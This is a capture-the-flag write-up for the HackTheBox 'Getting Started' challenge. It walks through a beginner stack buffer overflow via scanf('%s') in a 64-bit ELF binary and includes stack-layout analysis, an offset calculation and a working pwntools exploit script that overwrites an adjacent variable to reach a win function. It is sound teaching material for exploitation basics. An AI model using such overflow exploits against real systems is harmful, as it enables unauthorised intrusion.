pwnfreeeasy

Getting Started

hackthebox

Task: Tutorial challenge with 64-bit ELF binary using scanf without length check. Solution: Buffer overflow to overwrite adjacent stack variable and trigger win condition.

$ ls tags/ techniques/

buffer_overflow variable_overwrite beginner stack

buffer_overflowstack_layout_analysisvariable_corruption

Getting Started — HackTheBox

Description

Tutorial challenge for learning buffer overflow basics. Binary file gs — 64-bit ELF with PIE and NX enabled, but no stack canary.

Target: 94.237.63.176:35784

Binary Security

Arch:       amd64-64-little
RELRO:      Full RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        PIE enabled

Analysis

Stack Layout (from main function)

rbp-0x30 (offset -48): Buffer[32 bytes]     <- user input
rbp-0x10 (offset -16): Alignment[8 bytes]   <- initialized to 0x6969696969696969
rbp-0x08 (offset -8):  Target[8 bytes]      <- initialized to 0xdeadbeef
rbp:                   Saved RBP
rbp+0x08:              Return address

Vulnerability

The program uses scanf("%s") to read user input into a buffer without length checking — classic buffer overflow.

Win Condition

17c5: movl    $0xdeadbeef, %eax
17ca: cmpq    %rax, -0x8(%rbp)    ; compare target with 0xdeadbeef
17ce: jne     0x17dc              ; if NOT equal — jump to win
17dc: callq   0x11f5 <win>        ; win() reads and prints flag.txt

If the target value is changed from 0xdeadbeef to anything else — the win() function is called.

Exploitation

Offset Calculation

Buffer starts at rbp-48
Target is at rbp-8
Distance = 48 - 8 = 40 bytes

Payload

Send 40 bytes to fill buffer (32) + alignment (8), then any additional bytes overwrite target.

[AAAA...AAAA][BBBBBBBB][CCCCCCCC]
 Buffer(32)   Align(8)  Target(8) <- overwritten!

Solution

#!/usr/bin/env python3
from pwn import *

IP = '94.237.63.176'
PORT = 35784

r = remote(IP, PORT)

# 40 bytes to target, then overwrite it
payload = b'A' * 40 + b'BBBBBBBB'

r.recvuntil(b'>')
r.sendline(payload)

r.recvuntil(b'HTB{', timeout=5)
flag = b'HTB{' + r.recvuntil(b'}')
success(f'Flag: {flag.decode()}')
r.close()

Key Indicators

Use this technique when:

scanf("%s") or gets() without length checking
Important variables are adjacent to the buffer on the stack
Variable comparison with a "magic" value
No stack canary (checksec shows "No canary found")
No RIP control required — changing a variable value is sufficient

Lessons

Stack layout — variables on the stack are arranged sequentially, buffer overflow affects adjacent variables
Simplest BOF — no control flow hijacking needed, just changing a value is enough
Checksec — always check binary protections before exploitation

Challenge Files

gs — 64-bit ELF binary
wrapper.py — exploit template
flag.txt — local test flag
glibc/ — provided libc files

$ cat /etc/motd

Liked this one?

Pro unlocks every writeup, every flag, and API access. $9/mo.

$ cat pricing.md

$ grep --similar

Similar writeups

[pwn][free]0xDiablos— hackthebox
[pwn][free]ipv8— umdctf
[pwn][free]Regularity— hackthebox
[pwn][Pro]Baby bof— uoftctf2026
[pwn][free]Labyrinth— HackTheBox